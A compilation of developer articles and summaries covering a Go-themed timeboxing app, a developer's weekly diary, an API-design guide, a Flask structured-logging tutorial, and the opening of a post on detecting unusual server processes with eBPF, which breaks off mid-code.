The article describes a productivity tool called WeiQi, inspired by the ancient strategy game Go (Weiqi), which transforms daily scheduling into a strategic game. It visualizes a user's day as a grid of 24 hours divided into 5-minute intervals, where tasks are dragged as "White Stones" and become "Black Stones" after 5 minutes of uninterrupted focus, visually representing conquered time. The tool also includes a macro heatmap view that aggregates daily focus data into a monthly grid, helping users identify peak productivity and distraction patterns.

Modern to-do lists are often endless, anxiety-inducing scroll-fests. They treat productivity as a sheer volume of output, leading to burnout. We wanted to fundamentally change how people perceive their daily schedule by treating time not as a list to conquer, but as a board to master.
Having always been fascinated by games in general, and ancient games in particular, we found the inspiration in the ancient strategy game of Weiqi (Go).
In Weiqi, the board is finite, players place stones with deep intention, and the goal is to gracefully claim territory.
We realized that timeboxing is simply the modern equivalent of this.
Your day is the board 🏁, your tasks 📋 are your stones ⚫⚪, and deep, uninterrupted focus ⏱️ is how you capture your territory 🚀
We wanted to build an app that brings the tactile, satisfying, and intentional strategy of Weiqi to everyday productivity.
WeiQi is a highly tactile, gamified timeboxing dashboard that turns your daily schedule into a strategic game of focus.
Your day is visualized as a beautiful wooden grid of 24 hours (rows) and 5-minute intervals (columns).
You drag unstructured tasks from your Inbox onto the board. Upon dropping them, they morph into connected "White Stones," visually reserving that territory for future work.
When real-world time catches up to a scheduled task, the app's analog clock smoothly morphs into a Pomodoro timer.
White stones represent potential or pending work: scheduled tasks, planned breaks, or incomplete work. Solid Black stones represent conquered territory: deep, uninterrupted focus.
As you work, every 5 minutes of unbroken focus triggers a satisfying 3D animation, physically flipping a White Stone ⚪ to a solid Black Stone ⚫. You don't just check a box; you visually conquer your timeline.
If you stop a timer before the 5 minutes are up, the stone simply remains White. A timeline scattered with White stones visually represents a fragmented day lacking deep focus, making invisible distractions painfully visible.
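The stone mechanics described above can be modelled roughly as follows. This is a sketch under stated assumptions, not the app's actual code: the board is taken to be 24 rows of 12 five-minute slots, and the names `new_board`, `schedule`, and `record_focus` are hypothetical.

```python
EMPTY, WHITE, BLACK = ".", "W", "B"
HOURS, SLOTS_PER_HOUR, SLOT_SECONDS = 24, 12, 300  # 12 five-minute slots per hour
TOTAL_SLOTS = HOURS * SLOTS_PER_HOUR


def new_board():
    """An empty day: 24 rows (hours) by 12 columns (5-minute intervals)."""
    return [[EMPTY] * SLOTS_PER_HOUR for _ in range(HOURS)]


def schedule(board, hour, slot, n_slots):
    """Dropping a task reserves n_slots consecutive cells as White stones."""
    start = hour * SLOTS_PER_HOUR + slot
    for i in range(start, min(start + n_slots, TOTAL_SLOTS)):
        row, col = divmod(i, SLOTS_PER_HOUR)
        board[row][col] = WHITE


def record_focus(board, hour, slot, focused_seconds):
    """Flip one White stone to Black per full 5 minutes of unbroken focus."""
    start = hour * SLOTS_PER_HOUR + slot
    full_slots = focused_seconds // SLOT_SECONDS  # a partial slot stays White
    flipped = 0
    for i in range(start, min(start + full_slots, TOTAL_SLOTS)):
        row, col = divmod(i, SLOTS_PER_HOUR)
        if board[row][col] == WHITE:
            board[row][col] = BLACK
            flipped += 1
    return flipped


board = new_board()
schedule(board, hour=9, slot=10, n_slots=4)   # 09:50 to 10:10
flipped = record_focus(board, hour=9, slot=10, focused_seconds=720)  # 12 minutes
```

Twelve minutes of focus covers two full slots, so two stones flip and the remaining two stay White.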
The Macro Heatmap, with monthly and weekly views, automatically aggregates your daily Black Stones into a zoomed-out Weiqi board that serves as a heatmap of your peak productivity hours 👩‍💻.
It also aggregates White Stones to show your peak distracted hours 😥.
We built the project in phases, step by step, using multi-turn chats.
In Phase 1, we built the foundation and the game board layout: the to-do list inbox and the game board, plus elements such as the wooden clock, the Pomodoro timer, and the dashboard.
In Phase 2, we implemented the drag-and-drop "Playing the Stones" mechanics for the Daily Board, where tasks from the to-do list transform into tactile "White Stones" on the grid.
In Phase 3, we implemented the timer logic and the capturing of "Black Stones".
In Phase 4, we built The Big Picture (The Macro Weiqi Game), which introduces a toggle switch to transition from the daily planner to a zoomed-out, automatically generated monthly grid (Days vs. Hours). This read-only board automatically translates the focused time (Black Stones) earned in the Daily View into a visual heatmap, allowing users to see their macro productivity trends at a glance.
The most impressive feature MeDo helped create was the automated monthly board.
This was the game changer. It also helped me create beautiful UI elements by drawing on design inspirations.

---
## Dev diary #1: what 15 minutes unlocked

> Published: 2026-05-24 03:41:54+00:00
> Source: https://dev.to/trainedloop/diario-de-dev-1-o-que-15-minutos-desbloqueou-1a38
> wpnews: https://wpnews.pro/news/diario-de-dev-1-o-que-15-minutos-desbloqueou

The article describes a software developer's week, highlighting how AI has lowered the barrier for creating user interfaces but not for deploying them, as a marketing colleague built a good page with AI but couldn't publish it without developer help. It also discusses the frustration of silent bugs that lack error messages, the complementary roles of automated tests and manual QA, and ongoing infrastructure work. Finally, the author explores voice synthesis for a game engine, finding that offline options like Kokoro sound robotic in Brazilian Portuguese while online services like ElevenLabs offer better quality but incur per-character costs.

Second week of the diary. If the previous one covered a whole month of building and throwing things away, this one was more mundane. Infrastructure nobody sees, a small project that became a tool for someone else, and a night spent exploring a problem that still has no answer.
Someone on the marketing team showed me an event page they had built with AI. It looked good. Seriously, really good: the right colors, the right spacing, following the design system. Then came the question: "how do I put this online?"
That gap caught me by surprise. The hard work was done. The part I would have expected to be the obstacle, building the interface, had been solved by someone with no technical experience using AI. What got stuck was publishing. An infrastructure detail that is trivial for any dev, but a wall for someone who has never touched git or servers.
I set up a GitHub Pages repo where each folder automatically becomes a URL on our domain. Upload it, and it shows up at dominio.com/nome-do-evento. Fifteen minutes of setup.
What stayed with me was wondering how many other people are in this situation right now. AI has lowered the floor for creating interfaces a lot, but infrastructure still assumes knowledge that most people don't have and probably don't want to have. Dev work keeps changing, but it is not necessarily shrinking. Sometimes it becomes this: solving the last mile for someone who got that far on their own.
At work it was a week of the kind of work nobody will show in a presentation. Infrastructure, permissions, inconsistent state.
There's a category of bug I find particularly frustrating: the one that doesn't scream. No exception, no error message, no obvious log. Just a user stuck in a login flow that wouldn't advance and wouldn't explain why. When you finally understand what was happening, the fix fits in three lines. The hard part was getting there.
On top of that, we ran a heavier QA cycle on a complex screen in the product, the kind of screen where state comes from several places at once and the sources interfere with each other in ways that only show up when you put everything together. We had tests. They weren't enough.
It's not that the tests were bad. Automated tests tend to check what you imagined could go wrong. External QA finds what you didn't imagine. They are two different kinds of coverage, and this week made it clear again that one does not replace the other.
The rest was infra. This kind of work has its own rhythm: you think it will be quick, find out it isn't, adjust, test again. Cloud usually has at least one surprise tucked away in some permission you didn't expect to need to configure.
RPGTeller is a gamebook engine I'm building. This week I wanted to explore voice narration, giving each character a distinct voice.
I started with Kokoro, a speech synthesis option that runs offline. It has obvious appeal for a project like this: no API dependency, no per-character cost, runs locally. The problem is that the Brazilian Portuguese voice acting came out too robotic. Functional, but far from immersive.
I moved to ElevenLabs. It was better, good enough for me to assign specific voices per character: a narrator voice, another for Svetlana, another for the warrior. You can imagine how it will sound in the game.
But ElevenLabs is an API paid per character. Before going down that path, I want to know whether I can get acceptable quality running something locally. I don't know the answer yet.
I didn't finish this exploration. I still want to test more options, especially ones that run locally and have acceptable quality in pt-BR. For now the score is: Kokoro bad, ElevenLabs good but online.
Diary #0 covered a month. This one covered a normal week. If you want to keep up with the next ones, follow along.

---
## The Complete Guide to API Design in 2026: REST, GraphQL, and tRPC in Production

> Published: 2026-05-24 03:38:19+00:00
> Source: https://dev.to/zny10289/the-complete-guide-to-api-design-in-2026-rest-graphql-and-trpc-in-production-4ib2
> wpnews: https://wpnews.pro/news/the-complete-guide-to-api-design-in-2026-rest-graphql-and-trpc-in-production

The article summarizes the 2026 API design landscape, identifying three dominant patterns: REST for public APIs and microservices, GraphQL for complex data requirements, and tRPC for TypeScript-to-TypeScript full-stack applications. It emphasizes that teams should choose based on fit rather than hype, and provides specific guidance on when to use each technology, including best practices for error handling, versioning, and rate limiting. The article also includes a decision flowchart to help teams select the appropriate API approach based on their environment and needs.

# The Complete Guide to API Design in 2026: REST, GraphQL, and tRPC in Production

The API design landscape in 2026 settled into three clear patterns. REST for public APIs and microservices. GraphQL for complex data requirements. tRPC for TypeScript-to-TypeScript full-stack applications.

Each has a legitimate use case. The mistakes happen when teams choose based on hype rather than fit.

## REST in 2026: Still the Default for a Reason

REST APIs remain the dominant pattern for:

- Public and partner APIs (ease of documentation and tooling)
- Microservices that need simple, well-defined contracts
- Teams without TypeScript full-stack expertise

The key REST improvements in 2026:

### Better Error Responses

```
{
  "error": {
    "code": "VALIDATION_ERROR",
    "message": "Request validation failed",
    "details": [
      {
        "field": "email",
        "code": "INVALID_FORMAT",
        "message": "Must be a valid email address"
      }
    ],
    "requestId": "req_a1b2c3d4e5"
  }
}
```

The `requestId` addition transformed our debugging. Every error now links to structured logs.
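A small helper keeps that envelope consistent across endpoints. The sketch below is illustrative only: the function name `validation_error` and the `req_` plus ten hex characters ID scheme are assumptions modelled on the example payload, not part of any framework.

```python
import json
import uuid


def validation_error(details, request_id=None):
    """Build the error envelope shown above; request_id is generated if absent."""
    return {
        "error": {
            "code": "VALIDATION_ERROR",
            "message": "Request validation failed",
            "details": list(details),
            # Assumed ID format: "req_" followed by 10 hex characters.
            "requestId": request_id or f"req_{uuid.uuid4().hex[:10]}",
        }
    }


body = validation_error(
    [{"field": "email", "code": "INVALID_FORMAT", "message": "Must be a valid email address"}],
    request_id="req_a1b2c3d4e5",
)
payload = json.dumps(body)
```

Logging the same `requestId` alongside the server-side stack trace is what makes the link between a client report and the structured logs possible.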

### API Versioning

Still the most contentious topic. Our 2026 recommendation: URL versioning for major breaking changes only.

```
GET /v1/users     ← Major version, breaking changes
GET /users?since= ← Minor additions, no versioning
```

### Rate Limiting Headers

Standardized rate limit headers finally emerged as a convention:

```
X-RateLimit-Limit: 1000
X-RateLimit-Remaining: 999
X-RateLimit-Reset: 1716560400
Retry-After: 3600
```
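On the client side, these headers translate into a wait time before the next attempt. The sketch below is a minimal interpretation under stated assumptions: `headers` is a plain dict with exactly the header casing shown above, `Retry-After` is given in seconds (the HTTP-date form is not handled), and `X-RateLimit-Reset` is a Unix timestamp. The function name `seconds_until_retry` is hypothetical.

```python
import time


def seconds_until_retry(headers, now=None):
    """Return how long a client should wait before retrying, in seconds."""
    now = time.time() if now is None else now

    # An explicit Retry-After in seconds takes priority.
    retry_after = headers.get("Retry-After")
    if retry_after is not None and retry_after.isdigit():
        return float(retry_after)

    # Otherwise wait for the window to reset, but only if the quota is exhausted.
    if headers.get("X-RateLimit-Remaining") == "0":
        reset = headers.get("X-RateLimit-Reset")
        if reset is not None and reset.isdigit():
            return max(0.0, float(reset) - now)

    return 0.0


wait = seconds_until_retry(
    {"X-RateLimit-Remaining": "0", "X-RateLimit-Reset": "1716560400"},
    now=1716560000,
)
```

Passing `now` explicitly keeps the function deterministic in tests; production callers can omit it.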

## GraphQL: When It's Actually the Right Choice

GraphQL shines when:

- **Complex, nested data requirements**: A dashboard that pulls users, their orders, the products in those orders, and supplier data for those products. With REST, this requires 4+ requests or a massively overfetching endpoint.
- **Multiple client types**: Mobile (needs different data than desktop) and web clients with different requirements. GraphQL's flexible queries handle this cleanly.
- **Rapid client evolution**: When your mobile and web teams work independently, GraphQL's schema contract reduces coordination overhead.

### When GraphQL Is Wrong

- **Simple CRUD**: If you're mostly doing Create, Read, Update, Delete on single resources, REST is simpler and has better tooling for this pattern.
- **File uploads**: Still awkward in GraphQL. Use REST for this.
- **Caching**: REST with HTTP caching is simpler and more efficient for publicly cacheable data.

### The Schema Design Discipline

GraphQL's superpower is the type system. But it requires discipline:

```
type User {
  id: ID!
  email: String!
  createdAt: DateTime!

  # Explicitly define what's included, avoid N+1
  orders(first: Int, after: String): OrderConnection!
  totalOrderCount: Int! # Pre-computed, not derived
}

type OrderConnection {
  edges: [OrderEdge!]!
  pageInfo: PageInfo!
  totalCount: Int!
}
```

Exposing `totalCount` as a separate, pre-computed field avoids running a COUNT(*) query on every request.
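A resolver for the `orders(first, after)` field can be sketched as follows. This is an illustration under assumptions, not the article's implementation: the cursor is an opaque base64-encoded list index, the `pageInfo` keys `hasNextPage` and `endCursor` follow the common Relay-style convention (the schema above does not show them), and `paginate` is a hypothetical helper over an in-memory list.

```python
import base64


def encode_cursor(index):
    """Opaque cursor: base64 of 'idx:<position>' (an assumed scheme)."""
    return base64.b64encode(f"idx:{index}".encode()).decode()


def decode_cursor(cursor):
    return int(base64.b64decode(cursor).decode().split(":", 1)[1])


def paginate(items, first=10, after=None, total_count=None):
    """Return an OrderConnection-shaped dict for one page of items."""
    start = decode_cursor(after) + 1 if after else 0
    window = items[start:start + first]
    edges = [
        {"cursor": encode_cursor(start + offset), "node": item}
        for offset, item in enumerate(window)
    ]
    return {
        "edges": edges,
        "pageInfo": {
            "hasNextPage": start + len(window) < len(items),
            "endCursor": edges[-1]["cursor"] if edges else None,
        },
        # Pass a stored counter here to avoid counting on every request.
        "totalCount": len(items) if total_count is None else total_count,
    }


orders = ["a", "b", "c", "d", "e"]
page1 = paginate(orders, first=2)
page2 = paginate(orders, first=2, after=page1["pageInfo"]["endCursor"])
```

In a real service the slice would be a keyset query and `total_count` would come from a maintained counter column.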

## tRPC: The TypeScript Revolution

tRPC became the default for TypeScript monorepos in 2025-2026. The appeal is real: end-to-end type safety without code generation.

``` js
// Server: define the procedure
const userRouter = router({
  getById: publicProcedure
    .input(z.object({ id: z.string() }))
    .query(async ({ input }) => {
      return db.user.findUnique({ where: { id: input.id } });
    }),
});

// Client: fully typed, no code generation
const user = await trpc.user.getById.query({ id: userId });
// user is typed based on the server definition
```

The productivity gains are real for teams already in TypeScript. The tradeoff: you need a TypeScript monorepo, and the learning curve for Zod schemas is real.

### When to Choose tRPC

✅ **Perfect for**: Full-stack TypeScript teams, rapid development, internal tools, startups moving fast

❌ **Not for**: Multi-language environments, public APIs, teams without TypeScript expertise

## The Decision Framework

```
Is your team TypeScript-first with a monorepo?
  → YES → tRPC for internal services, REST for public APIs
  → NO  → Continue below

Do clients need different data shapes for the same endpoint?
  → YES → GraphQL
  → NO  → Continue below

Is this a public/partner API?
  → YES → REST (better tooling, easier to document, broader client support)
  → NO  → REST is probably fine, GraphQL if the data model is complex
```

## The Tooling That Matters in 2026

For REST:

- **Zod** for input validation (replaced Joi and class-validator)
- **Hono** or **Fastify** for the framework (Express is showing its age)
- **scalar** or **redocly** for API documentation

For GraphQL:

- **GraphQL Yoga 5** (replaced Apollo Server as the default)
- **pothos** or **nexus** for code-first schema development
- **Studio** for Explorer and monitoring

For tRPC:

- **tanstack-query** as the client (works with tRPC natively)
- **Zod** for input validation
- **Kysely** for type-safe database queries


---
## 🐍 Flask Python Structured Logging — What Most Miss in Production

> Published: 2026-05-24 03:37:27+00:00
> Source: https://dev.to/ptp2308/flask-python-structured-logging-what-most-miss-in-production-45g6
> wpnews: https://wpnews.pro/news/flask-python-structured-logging-what-most-miss-in-production

The article explains that approximately 80% of Flask applications still use basic `print()` statements or unstructured logging in production, which hinders effective debugging and monitoring despite the availability of modern tools like Datadog and Elasticsearch. It demonstrates how to implement structured JSON logging using Python's built-in `logging` module with a custom `JsonFormatter`, and also highlights the simpler alternative of using the Loguru library, which offers cleaner syntax and native support for structured output through features like contextual binding with `bind()`.

Roughly 80% of Flask applications still rely on basic `print()` statements or unstructured `logging.info()` calls for observability in production. Despite widespread adoption of modern monitoring tools like Datadog, Loki, and Elasticsearch, most Python web apps ship logs as plain text, which makes debugging slow, filtering unreliable, and alerting brittle. This isn’t a legacy issue; it’s happening in brand-new Flask services today.

**📑 Table of Contents**

- ⚙️ Built-in Logging: Why *Structure* Matters
- 🐍 Loguru: Simpler, More *Expressive* Setup
- 🧠 Context Propagation: Keeping Data Across Functions
- 🔧 Handling Exceptions: Auto-JSON Tracebacks
- 📦 Flask Integration: *Seamless* Middleware Injection
- 💡 Filtering Noise: Exclude Health Checks
- 🔐 Security: Avoid Logging Sensitive Data
- 🔍 Production Best Practices: Making Logs *Actionable*
- 📦 Deployment: Logging in Docker & Kubernetes
- 📉 Monitoring: Querying Structured Logs
- 🟩 Final Thoughts
- ❓ Frequently Asked Questions
  - Can I use both Python logging and Loguru in the same app?
  - How do I rotate JSON log files in production?
  - Are JSON logs slower than plain text?
- 📚 References & Further Reading

## ⚙️ Built-in Logging — Why *Structure* Matters

The Python `logging` module is not a thin wrapper around `print()`; it is a fully composable system for routing, formatting, and filtering log records based on severity, source, and custom context. Every log call (e.g., `logger.info("User logged in")`) creates a `LogRecord` object. This record carries metadata (timestamp, filename, line number, function name, log level) before any formatter processes it. That metadata enables deterministic serialization into JSON without context loss. To emit structured output, replace the default `logging.Formatter` with one that serializes the record.

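``` python
import json
import logging
import sys

# Attribute names present on every LogRecord; anything else came from `extra`.
_STANDARD_ATTRS = set(vars(logging.LogRecord("", 0, "", 0, "", (), None))) | {"message", "asctime"}


class JsonFormatter(logging.Formatter):
    def format(self, record):
        log_entry = {
            "timestamp": self.formatTime(record, self.datefmt),
            "level": record.levelname,
            "logger": record.name,
            "module": record.module,
            "function": record.funcName,
            "line": record.lineno,
            "message": record.getMessage(),
        }
        # Copy fields passed via `extra=` to the top level of the entry.
        for key, value in vars(record).items():
            if key not in _STANDARD_ATTRS:
                log_entry[key] = value
        if record.exc_info:
            log_entry["exception"] = self.formatException(record.exc_info)
        return json.dumps(log_entry, default=str)


# Configure root logger
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(JsonFormatter())
logging.basicConfig(handlers=[handler], level=logging.INFO)

logger = logging.getLogger("flask_app")
```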

Now, when you log:

```
logger.info("User login attempted", extra={"user_id": 123, "ip": "192.168.1.1"})
```

You get:

```
{"timestamp": "-11-15 14:22:30,123", "level": "INFO", "logger": "flask_app", "module": "auth", "function": "login", "line": 45, "message": "User login attempted", "user_id": 123, "ip": "192.168.1.1"}
```

The keys in the `extra` dictionary become attributes on the `LogRecord` instance. They appear at the top level of the JSON output only when the formatter copies those non-standard attributes into the entry, so the formatter is the one place where this behavior has to be implemented.

## 🐍 Loguru — Simpler, More *Expressive* Setup

The standard `logging` module requires boilerplate and careful handler management. Loguru reduces that surface area with better defaults, cleaner composition, and native support for structured output. Its core abstraction is the **sink**, a generalized destination for log events. Sinks can be streams, files, or network endpoints, and each can have its own format, filter, and serialization logic. Install it:

``` bash
$ pip install loguru

Collecting loguru
  Downloading loguru-0.7.2-py3-none-any.whl (58 kB)
Installing collected packages: loguru
Successfully installed loguru-0.7.2
```

Configure JSON output:

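``` python
from loguru import logger
import json
import sys


def json_sink(message):
    # A callable sink receives the message; its `record` attribute holds the fields.
    # (Returning JSON from a `format` callable would not work: Loguru treats the
    # returned string as a format template and would try to interpret the braces.)
    record = message.record
    entry = {
        "time": record["time"].isoformat(),
        "level": record["level"].name,
        "message": record["message"],
        "module": record["module"],
        "function": record["function"],
        "line": record["line"],
        **record["extra"],
    }
    sys.stdout.write(json.dumps(entry, default=str) + "\n")


# Remove default handler
logger.remove()

# Add JSON sink
logger.add(json_sink, level="INFO")
```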

Loguru supports contextual binding via `bind()`:

``` python
@app.route("/login", methods=["POST"])
def login():
    user_id = authenticate(request.json)
    if user_id:
        authenticated_logger = logger.bind(user_id=user_id, ip=request.remote_addr)
        authenticated_logger.info("User authenticated")
        return {"status": "ok"}
    else:
        logger.warning("Login failed", ip=request.remote_addr)
        return {"status": "unauthorized"}, 401
```

Output:

```
{"time": "-11-15T14:25:10.123456+00:00", "level": "INFO", "message": "User authenticated", "module": "app", "function": "login", "line": 23, "user_id": 456, "ip": "192.168.1.1"}
```

`bind()` returns a new logger with the given key-value pairs attached, so every subsequent log call made through that returned logger carries them. The original `logger` is left unchanged. This avoids repetitive `extra` kwargs and reduces error surface.

Structured logging isn’t about format — it’s about making every log line queryable, filterable, and traceable.

### 🧠 Context Propagation — Keeping Data Across Functions

In Flask, request-scoped data like trace IDs or user identifiers should appear in all logs for that request without manual pass-through. Loguru's `contextualize()` relies on Python’s `contextvars` to keep state isolated across async and threaded contexts, and a patcher function registered through `patch()` or `configure(patcher=...)` can inject request-scoped data into every log record within the request lifecycle.

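``` python
from flask import g, has_request_context, request


def add_request_context(record):
    # Copy request-scoped fields into every record logged during a request.
    if has_request_context():
        record["extra"].update(g.get("log_context", {}))


# Register the patcher once, at startup. Calling bind() or patch() and
# discarding the returned logger would have no effect.
logger.configure(patcher=add_request_context)


@app.before_request
def attach_log_context():
    # `g` is reset for each request, so no explicit cleanup hook is needed.
    g.log_context = {"trace_id": request.headers.get("X-Trace-ID", "unknown")}
```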

Once the context is attached, every `logger.info()` or `logger.error()` call within the request includes the `trace_id` field. This aligns logs across functions and services during incident investigation.
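The same idea can be illustrated with only the standard library, which makes the mechanism easier to see in isolation. The sketch below is not Loguru's implementation: it uses a `contextvars.ContextVar` plus a `logging.Filter`, and the names `trace_id_var`, `TraceIdFilter`, `ListHandler`, and `handle_request` are hypothetical.

```python
import contextvars
import logging

# Hypothetical context variable holding the current request's trace ID.
trace_id_var = contextvars.ContextVar("trace_id", default="unknown")


class TraceIdFilter(logging.Filter):
    """Copy the current trace ID onto every record that passes through."""

    def filter(self, record):
        record.trace_id = trace_id_var.get()
        return True


class ListHandler(logging.Handler):
    """Collect formatted lines in memory so the effect is easy to inspect."""

    def __init__(self):
        super().__init__()
        self.lines = []

    def emit(self, record):
        self.lines.append(self.format(record))


def build_logger(name="trace_demo"):
    handler = ListHandler()
    handler.setFormatter(logging.Formatter("%(trace_id)s %(message)s"))
    handler.addFilter(TraceIdFilter())
    log = logging.getLogger(name)
    log.handlers = [handler]
    log.setLevel(logging.INFO)
    log.propagate = False
    return log, handler


def handle_request(log, trace_id):
    token = trace_id_var.set(trace_id)  # start of request
    try:
        log.info("step one")
        log.info("step two")            # no trace ID passed by hand
    finally:
        trace_id_var.reset(token)       # end of request


log, handler = build_logger()
handle_request(log, "abc123")
log.info("outside any request")
```

Neither log call inside `handle_request` mentions the trace ID, yet both lines carry it, and the value falls back to the default once the request ends.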

### 🔧 Handling Exceptions — Auto-JSON Tracebacks

Loguru captures full stack traces by default when using `logger.exception()`:

```
try:
    risky_operation()
except Exception:
    logger.exception("Operation failed")
```

Output includes:

```
"exception": "Traceback (most recent call last):\\n File \"app.py\", line 30, in login\\n risky_operation()\\n File \"utils.py\", line 12, in risky_operation\\n raise ValueError('Boom')\\nValueError: Boom"
```

For non-critical paths, use the `@logger.catch` decorator:

``` python
@logger.catch
def risky_operation():
    return 1 / 0
```

This logs the traceback and prevents the exception from halting execution. Useful for optional processing or background tasks where failure shouldn't crash the request.

## 📦 Flask Integration — *Seamless* Middleware Injection

To gain observability at the HTTP layer, capture request metadata (method, path, status, duration) automatically. Use Flask’s `before_request` and `after_request` hooks to wrap each incoming request.

``` python
from time import time
from flask import request, g


@app.before_request
def start_timer():
    g.start = time()


@app.after_request
def log_request(response):
    duration = time() - g.start
    # bind() returns a new logger, so log through the returned instance.
    logger.bind(method=request.method, path=request.path, ip=request.remote_addr).info(
        "Request completed",
        status=response.status_code,
        duration=f"{duration:.4f}s",
        length=response.content_length or "-",
    )
    return response
```

Example output:

```
{"time": "-11-15T14:30:00.123456+00:00", "level": "INFO", "message": "Request completed", "module": "app", "function": "log_request", "line": 45, "method": "POST", "path": "/login", "ip": "192.168.1.1", "status": 200, "duration": "0.1234s", "length": "15"}
```

This adds full request observability without touching application logic.

### 💡 Filtering Noise — Exclude Health Checks

Health endpoints like `/health` or `/metrics` generate high-volume, low-value logs. Filter them early to reduce noise and storage cost. Skip binding and timing for known endpoints:

``` python
@app.before_request
def start_timer():
    # Skip timing for known noisy endpoints. log_request() must then return
    # early when "start" is not in g, or it will fail on the missing timer.
    if request.path in ["/health", "/metrics"]:
        return
    g.start = time()
```

Alternatively, disable logging per route using a decorator:

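``` python
from functools import wraps


def no_log(func):
    @wraps(func)  # keep the view's name so Flask endpoints stay unique
    def wrapper(*args, **kwargs):
        # Loguru has no per-call "disabled" context manager, so tag the
        # records emitted inside the view and drop them at the sink.
        with logger.contextualize(skip_log=True):
            return func(*args, **kwargs)
    return wrapper


@app.route("/health")
@no_log
def health():
    return "OK"


# The sink needs a matching filter, for example:
# logger.add(sys.stdout, filter=lambda record: not record["extra"].get("skip_log"))
```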

### 🔐 Security — Avoid Logging Sensitive Data

Never log passwords, authentication tokens, or personally identifiable information (PII). Sanitize request payloads before inclusion:

```
safe_data = {k: v for k, v in request.json.items() if k not in {"password", "token"}}
logger.bind(body=safe_data).info("Login request received")
```

Prefer allowlists over denylists:

```
logged_fields = {k: request.json[k] for k in ["email", "country"] if k in request.json}
```

This ensures only explicitly permitted fields enter the log stream.

## 🔍 Production Best Practices — Making Logs *Actionable*

Structured logs only deliver value if used correctly in production environments.

First, always emit logs to `stdout`. Container orchestrators like Kubernetes expect applications to write logs to standard output so agents (e.g., Fluentd, Vector, Filebeat) can collect and forward them. Avoid writing directly to files.

Second, standardize field names. Use consistent keys such as `http.method`, `http.status_code`, `user.id`, and `trace.id` across services. This enables reusable dashboards and alerting rules in tools like Grafana or Datadog.

Third, adopt correlation IDs. Generate a unique ID per request and propagate it through logs and downstream services.

``` python
import uuid


@app.before_request
def add_correlation_id():
    cid = request.headers.get("X-Correlation-ID") or str(uuid.uuid4())
    g.correlation_id = cid
    # bind() returns a new logger; keep it on g so views can log with the ID attached.
    g.logger = logger.bind(correlation_id=cid)


@app.after_request
def add_correlation_header(response):
    response.headers["X-Correlation-ID"] = g.correlation_id
    return response
```

Fourth, manage log levels rigorously. Use `DEBUG` for detailed traces, `INFO` for operational milestones, `WARNING` for recoverable anomalies, and `ERROR` for failures. Apply level filtering at the sink:

```
logger.add(sys.stdout, level="INFO", serialize=True)
```

Fifth, consider performance. JSON serialization adds measurable CPU overhead under load. For high-throughput services, use `orjson`, an optimized JSON library written in Rust.

``` python
import orjson


def json_serializer(obj):
    # orjson.dumps() returns bytes, so decode to get a str.
    return orjson.dumps(obj).decode()
```

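According to the `orjson` project's own benchmarks, its `dumps()` is roughly 10× faster than the standard `json` module, with larger gains reported for `dataclass` instances, and it handles common types like `datetime` and `dataclass` natively.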

### 📦 Deployment — Logging in Docker & Kubernetes

In Kubernetes, pod logs are scraped from `stdout` by default. No custom configuration is required if your app emits JSON. Verify output:

``` bash
$ kubectl logs my-flask-pod-7x9f2

{"time": "-11-15T14:35:00.123456+00:00", "level": "INFO", "message": "Request completed", "method": "GET", "path": "/api/users", "status": 200}
```

Ensure your log agent parses JSON correctly. For Fluentd, use a `<parse>` section with `@type json`. For Grafana Loki, configure `pipeline_stages` in your agent to extract structured labels.

### 📉 Monitoring — Querying Structured Logs

With JSON logs, you move from text scanning to precise querying.

In **Loki**: `{job="flask"} | json | level="ERROR" and path="/login"`

In **Datadog**: `service:flask @level:ERROR @http.status_code:5xx`

In **Elasticsearch**: `{"query": {"term": {"http.status_code": "500"}}}`

Filtering by `status:500` or `path:/login` executes in milliseconds instead of scanning gigabytes of text. That precision is the core advantage of structured logging.
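The same kind of field-based query can be tried locally against a captured log file before any backend is involved. The sketch below is a hypothetical helper, `filter_logs`, that assumes one JSON object per line and exact-match conditions on top-level keys; it only illustrates why structured fields are easier to filter than free text.

```python
import json


def filter_logs(lines, **conditions):
    """Return parsed entries whose top-level fields equal every given condition."""
    matches = []
    for line in lines:
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip plain-text lines mixed into the stream
        if not isinstance(entry, dict):
            continue
        if all(entry.get(key) == value for key, value in conditions.items()):
            matches.append(entry)
    return matches


sample = [
    '{"level": "INFO", "path": "/login", "status": 200}',
    '{"level": "ERROR", "path": "/login", "status": 500}',
    '{"level": "ERROR", "path": "/api/users", "status": 500}',
    "plain text line that a grep-based approach would have to guess at",
]
login_errors = filter_logs(sample, level="ERROR", path="/login")
```

The conditions are keyword arguments, so adding another field to the query is a one-word change rather than a new regular expression.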

Good logs don’t just tell you what failed — they tell you who, when, where, and how it mattered.

## 🟩 Final Thoughts

Adding structured JSON logging to a Flask app isn’t a refactor — it’s a shift in how you treat logs. They become first-

---
## Detecting unusual processes on your servers without writing a single rule

> Published: 2026-05-24 03:27:41+00:00
> Source: https://dev.to/gretl/detecting-unusual-processes-on-your-servers-without-writing-a-single-rule-2he
> wpnews: https://wpnews.pro/news/detecting-unusual-processes-on-your-servers-without-writing-a-single-rule

The article describes a system for detecting unusual server processes that learns what "normal" behavior looks like automatically, eliminating the need for manually written security rules. It uses eBPF to capture process execution data at the kernel level, converts each event into a vector using feature hashing for similarity comparison, and stores the data in LanceDB to identify deviations from established baselines. The authors argue this approach catches novel attacks and forgotten processes that traditional rule-based tools like Falco or Wazuh would miss.

Most security tooling works by asking you to define what "bad" looks like upfront. Falco gives you YAML rules. OSSEC has signatures. Wazuh has a 5,000-line ruleset that ships with the product and still misses half of what matters in your specific environment.

The problem isn't that rules are bad — it's that they can only catch what someone already thought to write a rule for. A novel attack, an unusual deployment pattern, or a rogue process your team introduced six months ago and forgot about will all sail straight through.

We wanted something different: a system that learns what "normal" looks like on each server and workload automatically, and flags anything that deviates — without any configuration.

Here's how we built it using eBPF and LanceDB.

Step 1: Capture everything at the kernel level with eBPF

eBPF lets you attach programs to kernel events with minimal overhead. We attach to the sys_enter_execve tracepoint, which fires every time any process is executed on the machine — before the process even starts running.

For each execution we capture:

The process name (comm) and full command line (argv)

The parent process name

The UID of the calling process

Any active network connections (src/dst IP, port)

This is written in Rust using the Aya framework, which compiles the eBPF kernel program separately and loads it at runtime:

``` rust
#[tracepoint]
pub fn gretl_execve(ctx: TracePointContext) -> u32 {
    let filename_ptr = unsafe { ctx.read_at::<u64>(16)? } as *const u8;
    let pidtgid = bpf_get_current_pid_tgid();
    let pid = (pidtgid >> 32) as u32;

    let mut event = ExecveEvent {
        pid,
        comm:     [0u8; 16],
        filename: [0u8; 64],
        argv1:    [0u8; 64],
        // ...
    };

